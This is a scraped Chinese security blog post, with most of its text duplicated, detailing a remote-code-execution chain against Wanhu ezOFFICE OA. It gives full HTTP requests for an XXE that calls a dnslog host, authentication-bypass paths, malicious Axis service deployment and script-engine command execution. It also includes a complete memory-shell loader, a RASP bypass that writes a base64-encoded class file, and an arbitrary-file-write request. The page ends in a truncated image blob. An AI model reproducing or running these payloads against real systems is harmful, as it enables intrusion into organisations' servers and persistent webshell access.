IAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg==&quot;);
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
最后就是网上公开的poc了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在一种方法:使用`com.whir.ezoffice.ezform.util.StringUtil`这个类写文件
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
存在无参构造方法满足service条件
```java
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
String dirPath = &quot;&quot;;
if (fileName.lastIndexOf(&quot;/&quot;) != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf(&quot;/&quot;));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException(&quot;create directory '&quot; + dirPath + &quot;' failed!&quot;);
}
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + &quot;\n&quot;);
}
```
可以通过 printToFile 方法任意文件写,内容以及文件名均可控
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上众多的 freemarkerQa 服务均是调用的该类
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
<soapenv:Envelope xmlns:xsi=&quot;http://www.w3.org/2001/XMLSchema-instance&quot; xmlns:xsd=&quot;http://www.w3.org/2001/XMLSchema&quot; xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:util=&quot;http://util.ezform.ezoffice.whir.com&quot;>
<soapenv:Body>
<util:printToFile soapenv:encodingStyle=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>
<fileName xsi:type=&quot;soapenc:string&quot; xmlns:soapenc=&quot;http://schemas.xmlsoap.org/soap/encoding/&quot;>../server/oa/deploy/defaultroot.war/1.txt</fileName>
<content xsi:type=&quot;soapenc:string&quot;>x</content>
</util:printToFile>
</soapenv:Body>
</soapenv:Envelope>
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞但网上的poc。。。呃呃
还可以尝试打freemarker、bsh
万户作为老牌oa还是很值得去学习研究的
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)">![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-679b14fb254b2fb83cbe48b2e963318e78236e95.png)
之前实战遇到了但是网上的poc懂得都懂索性就专门研究一下
JDK版本1.6.0
操作系统Windows Server 2012
漏洞分析
----
从web.xml看起
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4bbb04580b8ae906e93dab8eefa4cc44dd21a238.png)
使用了 XFire 与 Axis 两种 WebService 框架
看到 XFire 配置文件`D:/jboss/jboss-as/server/oa/deploy/defaultroot.war/WEB-INF/classes/META-INF/xfire/services.xml`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-d33e85de27468a143fce1fdf4de45d91fb21d709.png)
配置了一个GeneralWeb的服务找到该类`com.whir.service.webservice.GeneralWeb`
```java
package com.whir.service.webservice;
import com.whir.service.common.CallApi;
public class GeneralWeb {
public String OAManager(String input) throws Exception {
CallApi callapi = new CallApi();
return callapi.getResult(input);
}
}
```
`com.whir.service.common.CallApi#getResult`
```java
public String getResult(String input) throws Exception {
if (serviceMap == null) {
throw new Exception("Error: serviceMap can not is null");
}
SAXBuilder builder = new SAXBuilder();
byte[] b = input.getBytes("utf-8");
InputStream is = new ByteArrayInputStream(b);
Document doc = builder.build(is);
Element root = doc.getRootElement();
```
使用SAXBuilder进行解析并且未进行过滤产生XXE漏洞
鉴权方面代码在`com.whir.common.util.SetCharacterEncodingFilter`
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-889c69a7c94a8f970c2f358344bf3ac33530d91d.png)
使用的是 getRequestURI那么就有很多绕过方法了简单列举几个
```php
/iWebOfficeSign/OfficeServer.jsp/../../
/xfservices/./GeneralWeb
.jsp;.js
```
漏洞利用
----
触发dnslog
```php
POST /defaultroot/xfservices/./GeneralWeb HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 457
&lt;soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:gen="http://com.whir.service/GeneralWeb"&gt;
&lt;soapenv:Body&gt;
&lt;gen:OAManager&gt;
&lt;gen:input&gt;
&amp;lt;?xml version="1.0" encoding="UTF-8"?&amp;gt;
&amp;lt;!DOCTYPE root [
&amp;lt;!ENTITY x SYSTEM "http://123.6x9ryk.dnslog.cn"&amp;gt;]&amp;gt;
&amp;lt;root&amp;gt;&amp;amp;x;&amp;lt;/root&amp;gt;
&lt;/gen:input&gt;
&lt;/gen:OAManager&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
因为使用了Axis我们可以通过AdminServlet创建任意服务看到server-config.wsdd
```xml
&lt;service name="AdminService" provider="java:MSG"&gt;
&lt;parameter name="allowedMethods" value="AdminService"/&gt;
&lt;parameter name="enableRemoteAdmin" value="false"/&gt;
&lt;parameter name="className" value="org.apache.axis.utils.Admin"/&gt;
&lt;namespace&gt;http://xml.apache.org/axis/wsdd/&lt;/namespace&gt;
&lt;/service&gt;
```
那么思路就很清晰了通过xxe的get请求部署恶意服务由于JDK是低版本那么可以部署RhinoScriptEngineService
```xml
http://127.0.0.1:{{Port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2F%22%20xmlns%3Ajava%3D%22http%3A%2F%2Fxml.apache.org%2Faxis%2Fwsdd%2Fproviders%2Fjava%22%3E%3Cservice%20name%3D%22RhinoScriptEngineService%22%20provider%3D%22java%3ARPC%22%3E%3Cparameter%20name%3D%22className%22%20value%3D%22com.sun.script.javascript.RhinoScriptEngine%22%20%2F%3E%3Cparameter%20name%3D%22allowedMethods%22%20value%3D%22eval%22%20%2F%3E%3CtypeMapping%20deserializer%3D%22org.apache.axis.encoding.ser.BeanDeserializerFactory%22%20type%3D%22java%3Ajavax.script.SimpleScriptContext%22%20qname%3D%22ns%3ASimpleScriptContext%22%20serializer%3D%22org.apache.axis.encoding.ser.BeanSerializerFactory%22%20xmlns%3Ans%3D%22urn%3Abeanservice%22%20regenerateElement%3D%22false%22%3E%3C%2FtypeMapping%3E%3C%2Fservice%3E%3C%2Fdeployment
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-933bab13bb758e5a40d3c7a1bdcffcb882bba84b.png)
部署成功
```php
POST /defaultroot/services/./RhinoScriptEngineService HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Content-Type: text/xml;charset=UTF-8
SOAPAction:
Content-Length: 973
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:jav="http://javascript.script.sun.com"&gt;
&lt;soapenv:Body&gt;
&lt;eval xmlns="http://127.0.0.1:8080/services/scriptEngine"&gt;
&lt;arg0 xmlns=""&gt;
&lt;![CDATA[
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.java.util);
var command = "cmd /c whoami";
var pb = new java.lang.ProcessBuilder(Arrays.asList(command.split(" ")));
var process = pb.start();
var ret = new java.util.Scanner(process.getInputStream()).useDelimiter('\\A').next();
ret;
]]&gt;
&lt;/arg0&gt;
&lt;arg1 xmlns="" xsi:type="urn:SimpleScriptContext" xmlns:urn="urn:beanservice"&gt;
&lt;/arg1&gt;
&lt;/eval&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-30d99a7f51736e83f9db2a190628914f5a45c840.png)
成功执行命令
### 内存马
Java-Js-Engine-Payloads&lt;https://github.com/yzddmr6/Java-Js-Engine-Payloads&gt;
适配了JDK6-14的内存马
```java
try {
load("nashorn:mozilla_compat.js");
} catch (e) {
}
function getUnsafe() {
var theUnsafeMethod =
java.lang.Class.forName("sun.misc.Unsafe").getDeclaredField("theUnsafe");
theUnsafeMethod.setAccessible(true);
return theUnsafeMethod.get(null);
}
function removeClassCache(clazz) {
var unsafe = getUnsafe();
var clazzAnonymousClass = unsafe.defineAnonymousClass(
clazz,
java.lang.Class.forName("java.lang.Class")
.getResourceAsStream("Class.class")
.readAllBytes(),
null
);
var reflectionDataField =
clazzAnonymousClass.getDeclaredField("reflectionData");
unsafe.putObject(clazz, unsafe.objectFieldOffset(reflectionDataField), null);
}
function bypassReflectionFilter() {
var reflectionClass;
try {
reflectionClass = java.lang.Class.forName(
"jdk.internal.reflect.Reflection"
);
} catch (error) {
reflectionClass = java.lang.Class.forName("sun.reflect.Reflection");
}
var unsafe = getUnsafe();
var classBuffer = reflectionClass
.getResourceAsStream("Reflection.class")
.readAllBytes();
var reflectionAnonymousClass = unsafe.defineAnonymousClass(
reflectionClass,
classBuffer,
null
);
var fieldFilterMapField =
reflectionAnonymousClass.getDeclaredField("fieldFilterMap");
var methodFilterMapField =
reflectionAnonymousClass.getDeclaredField("methodFilterMap");
if (
fieldFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(fieldFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
if (
methodFilterMapField
.getType()
.isAssignableFrom(java.lang.Class.forName("java.util.HashMap"))
) {
unsafe.putObject(
reflectionClass,
unsafe.staticFieldOffset(methodFilterMapField),
java.lang.Class.forName("java.util.HashMap")
.getConstructor()
.newInstance()
);
}
removeClassCache(java.lang.Class.forName("java.lang.Class"));
}
function setAccessible(accessibleObject) {
var unsafe = getUnsafe();
var overrideField = java.lang.Class.forName(
"java.lang.reflect.AccessibleObject"
).getDeclaredField("override");
var offset = unsafe.objectFieldOffset(overrideField);
unsafe.putBoolean(accessibleObject, offset, true);
}
function defineClass(bytes) {
var clz = null;
var version = java.lang.System.getProperty("java.version");
var unsafe = getUnsafe();
var classLoader = new java.net.URLClassLoader(
java.lang.reflect.Array.newInstance(
java.lang.Class.forName("java.net.URL"),
0
)
);
try {
if (version.split(".")[0] &amp;gt;= 11) {
bypassReflectionFilter();
defineClassMethod = java.lang.Class.forName(
"java.lang.ClassLoader"
).getDeclaredMethod(
"defineClass",
java.lang.Class.forName("[B"),
java.lang.Integer.TYPE,
java.lang.Integer.TYPE
);
setAccessible(defineClassMethod);
clz = defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
} else {
var protectionDomain = new java.security.ProtectionDomain(
new java.security.CodeSource(
null,
java.lang.reflect.Array.newInstance(
java.lang.Class.forName("java.security.cert.Certificate"),
0
)
),
null,
classLoader,
[]
);
clz = unsafe.defineClass(
null,
bytes,
0,
bytes.length,
classLoader,
protectionDomain
);
}
} catch (error) {
error.printStackTrace();
} finally {
return clz;
}
}
function base64DecodeToByte(str) {
var bt;
try {
bt = java.lang.Class.forName("sun.misc.BASE64Decoder").newInstance().decodeBuffer(str);
} catch (e) {
bt = java.lang.Class.forName("java.util.Base64").newInstance().getDecoder().decode(str);
}
return bt;
}
clz = defineClass(base64DecodeToByte(code));
clz.newInstance();
```
由于JBoss 低版本套的是 tomcat所以直接使用 tomcat 内存马即可
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-87ab87fce34e7e41b93767a4a479fcbcd37b3f8a.png)
使用Listener组件容错高
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-c1ea2c55639e04a5643b94defd04fd15cadbae59.png)
执行,无报错并且返回 200说明成功了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-24153a68c8d45034111bcc9bd3656df5280b0148.png)
随便找个路径连接即可
### RASP绕过
在命令执行的时候可能会遇到:**java.lang.SecurityException: cmd execute denied !!!**
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-4c237161525299a4b84664bcfc5e228953a77419.png)
即存在RASP而RASP一般是通过黑名单进行过滤的
这里禁用了ProcessBuilder我们尝试更底层的命令执行ProcessImpl该类是private所以只能反射调用
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-350f2ffdee079101528ae6f4106f34e2e2e5792b.png)
这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下
当调用setAccessible的时候会报错
```php
sun.org.mozilla.javascript.internal.EcmaError: TypeError: Cannot call method "setAccessible" of null
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-72f5ac149880b8a2ce93a7b044c47067ab32102c.png)
在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载
```java
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.lang.reflect.Method;
import java.util.Map;
public class Testcmd {
String result = "";
public Testcmd(String paramString) throws Exception{
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null &amp;amp;&amp;amp; osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
String[] cmds = isLinux ? new String[]{"bash", "-c", paramString} : new String[]{"cmd.exe", "/c", paramString};
Class clazz = Class.forName("java.lang.ProcessImpl");
Method method = clazz.getDeclaredMethod("start", String[].class, Map.class,String.class,boolean.class);
method.setAccessible(true);
InputStream ins = ((Process) method.invoke(null,cmds,null,null,true)).getInputStream();
ByteArrayOutputStream bos = new ByteArrayOutputStream();
byte[] bytes = new byte[1024];
int size;
while((size = ins.read(bytes)) &amp;gt; 0)
bos.write(bytes,0,size);
ins.close();
this.result = bos.toString();
}
public java.lang.String toString() {
return this.result;
}
public static void main(String[] args) {
}
}
```
没有ban掉File类可以将class文件写入到系统中
```java
try {
load("nashorn:Moziilla_compat.js");
} catch (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
var file = new File("../server/Testcmd.class");
var fos = new FileOutputStream(file);
var base64Decoder = new BASE64Decoder();
var decodeContent = base64Decoder.decodeBuffer("yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUALIAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg==");
fos.write(decodeContent, new Integer(0), new Integer(decodeContent.length));
fos.close();
```
最后就是网上公开的poc了
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-f4332d108c30507b1bfcbddd2005290a822b0cbf.png)
### StringUtil任意文件写
网上还存在一种方法:使用`com.whir.ezoffice.ezform.util.StringUtil`这个类写文件
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-fc12c86d40e331cd3ebfb1b6fca156c6ce9e0d9b.png)
存在无参构造方法满足service条件
```java
private static void writeToFile(String fileName, String content) throws IOException {
BufferedOutputStream outStream = null;
OutputStreamWriter writer = null;
try {
String dirPath = "";
if (fileName.lastIndexOf("/") != -1) {
dirPath = fileName.substring(0, fileName.lastIndexOf("/"));
}
File dir = new File(dirPath);
if (!dir.exists() &amp;amp;&amp;amp; !dir.mkdirs()) {
throw new IOException("create directory '" + dirPath + "' failed!");
}
outStream = new BufferedOutputStream(new FileOutputStream(fileName, true));
writer = new OutputStreamWriter(outStream);
writer.write(content);
} catch (IOException var9) {
throw var9;
} finally {
if (writer != null) {
writer.close();
}
if (outStream != null) {
outStream.close();
}
}
}
public static void printToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content);
}
public static void printlnToFile(String fileName, String content) throws IOException {
writeToFile(fileName, content + "\n");
}
```
可以通过 printToFile 方法任意文件写,内容以及文件名均可控
```php
http://127.0.0.1:{{port}}/defaultroot/services/./AdminService?method=!--%3E%3Cdeployment%20xmlns=%22http://xml.apache.org/axis/wsdd/%22%20xmlns:java=%22http://xml.apache.org/axis/wsdd/providers/java%22%3E%3Cservice%20name=%22freemarkerQa%22%20provider=%22java:RPC%22%3E%3Cparameter%20name=%22className%22%20value=%22com.whir.ezoffice.ezform.util.StringUtil%22/%3E%3Cparameter%20name=%22allowedMethods%22%20value=%22*%22/%3E%3C/service%3E%3C/deployment
```
网上众多的 freemarkerQa 服务均是调用的该类
```php
POST /defaultroot/./services/freemarkerQa HTTP/1.1
Host:
User-Agent: Moziilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 606
&lt;soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:util="http://util.ezform.ezoffice.whir.com"&gt;
&lt;soapenv:Body&gt;
&lt;util:printToFile soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;
&lt;fileName xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/"&gt;../server/oa/deploy/defaultroot.war/1.txt&lt;/fileName&gt;
&lt;content xsi:type="soapenc:string"&gt;x&lt;/content&gt;
&lt;/util:printToFile&gt;
&lt;/soapenv:Body&gt;
&lt;/soapenv:Envelope&gt;
```
![图片.png](https://shs3.b.qianxin.com/attack_forum/2024/09/attach-2f970068174235f1ffd981ed0d0d245886092c89.png)
验证成功
总结
--
实战中很有意思的一个漏洞但网上的poc。。。呃呃
还可以尝试打freemarker、bsh
万户作为老牌oa还是很值得去学习研究的
参考:
[万户rce](https://mp.weixin.qq.com/s/sktnBnCrZUoqkhGM0O9HRQ)
[实战 | 万户GeneralWeb组合Bypass Rasp](https://mp.weixin.qq.com/s/4FyX_zmY90yGLzdJgUGzcg)</textarea>
<div id=layer-photos-demo>
<div id=md_view><div class=markdown-body><p blockindex=0><img src=data:image/png;base64,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